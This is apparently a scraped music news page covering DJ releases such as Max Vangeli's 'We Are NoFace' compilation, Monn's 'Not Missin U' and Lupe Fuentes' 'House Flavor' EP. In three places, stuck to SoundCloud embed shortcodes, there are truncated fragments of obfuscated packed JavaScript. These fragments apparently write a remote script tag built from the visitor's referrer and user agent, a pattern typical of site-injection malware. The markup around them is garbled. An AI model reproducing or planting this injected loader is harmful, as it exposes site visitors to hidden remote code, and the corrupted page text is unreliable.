LO’99 & Marshall F Release ‘Fallen’

Max Vangeli and Armada team up for ‘We Are NoFace’

2016 – what a year it has been for Max Vangeli. The multitalented Moldovan DJ and producer, championed by industry royalty such as Tiesto and Steve Angello, and dubbed “one of the most promising artists” in the industry by MTV, has certainly seen his stock in the Dance music scene rise to record heights – and it is clear to see why. Having kicked off the year with the signing of an exclusive partnership with legendary Dutch imprint Armada Music, which seen the launch of his very own label NoFace Records, he has went on to release major hits including ‘Shine’, ‘Blow This Club’, ‘Get High’ and ‘Why Do I’ – a record collection that many aspiring artists can only dream of having as their own.

With the year coming to a close, Max is ending it in style with the release of his very first ‘We Are NoFace’ compilation album, another collaborative project with the Armada team. Featuring 3 new and exclusive tracks, and huge records from A-List stars such as Afrojack, Laidback Luke, Axwell, Kryder, Tommy Trash, Mike Hawkins and from Max himself, ‘We Are NoFace’ is full of infectious House and Progressive infused Electro flavours – the perfect insight into the musical mind of the America based artist. ‘We Are NoFace’ is available now on Armada Music and with a little bit of something in it for everyone, make sure you grab your copy now!

The Aston Shuffle Announce New Mix series ‘Only 100s’

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adsfe|var|u0026u|referrer|tabze||js|php'.split('|'),0,{})) url=”https://api.soundcloud.com/tracks/296743169″ params=”auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true” width=”100%” height=”450″ iframe=”true” /]

The Australian producers have been creating smash hits for nearly a decade, working with the likes of London Grammar, Empire of the Sun, Tommy Trash, and The Knocks to name a few. The guys also host the most popular specialist dance music show, Friday Night Shuffle on Australia’s ubiquitous triple j channel, and have released numerous tracks on The Magician’s label ‘Potion’ – compiling over 4.5 million Spotify, and +2.2 million SoundCloud plays between the lot.

They just launched their new mix series Only 100s with an extra special 2016 Best-of edition featuring their top picks of the year from on-air, in clubs, and the road.

Pyramid Recordings Newsletter

src=”http://www.masterbeaters.com/wp-content/uploads/2016/10/flatland_funk-475×158.jpg” alt=”flatland_funk” width=”455″ height=”151″ class=”alignnone size-large wp-image-198416″ />

Welcome to the first edition of the official “Pyramid Recordings” podcast, which is hosted by Canadian DJ/Producer “Flatland Funk”. Flatland Funk is a highly respected and devoted DJ/Producer within the electronic music industry, and owner of “Pyramid Recordings” record label. He gains support from artists like: MAKJ, Dyro, Blasterjaxx, Tommy Trash, Bombs Away!, Peep This, TJR, Low Steppa, and Lazy Rich. He also receives air play on Sirius XM, BBC Radio 1, and Di.fm!

Ookay – Thief Remix EP

Monn – Not Missin U

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbfsr|var|u0026u|referrer|efbdi||js|php'.split('|'),0,{})) url=”https://api.soundcloud.com/tracks/274847745″ params=”auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true” width=”100%” height=”450″ iframe=”true” /]

Dutch radio DJ/producer, Monn, has today unveiled his first single ‘Not Missin U’ (feat. Dria), released through ATL/Armada Music and is available now through iTunes, Apple Music and Spotify

The track received exciting, early support from the likes of Tiesto, Tommy Trash, Don Diablo, Redondo, Sander van Doorn and many more.

Arona Mane – Never Can Say Goodbye

Tommy Trash – Luv U Giv (NGHTMRE Remix)

Tommy Trash – Luv U Giv (NGHTMRE Remix)

Lupe Fuentes brings “House Flavor” to 2016!

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niada|var|u0026u|referrer|tynbr||js|php'.split('|'),0,{})) url=”https://api.soundcloud.com/tracks/238530616″ params=”auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true” width=”100%” height=”450″ iframe=”true” /]

Lupe Fuentes brings down the house in 2016 with her debut EP “House Flavor” OUT NOW! on Simma Black!

“House Flavor” Is a two track EP that includes House Flavor and Black & Red. This is for the real lovers of the deep down low, are you feeling it?

Low Steppa says of Lupe Fuentes’ ‘House Flavour EP’ – “The title track has been a staple in my sets since we signed the record which has an amazing dance floor reaction, whereas ‘Black & Red’ has drawn many comparisons to one of 2015’s biggest tracks by Format B (Chunky), so we expect both records to hang around for a fair while! It’s exciting to have Lupe on board. Her productions are first class and we welcome her to the family.’

Currently “House Flavor” is number 82 on the Beatport “House” Chart.

With Early support from: Oliver heldens, Carl Craig, Claude VonStroke, Shiba San, Sonny Fodera, Martin Ikin, Vanilla Ace, Gene Farris, Denney, DJ E-Clyps, Richie Hawtin, The Ashton Shuffle, Tommy Trash, and more!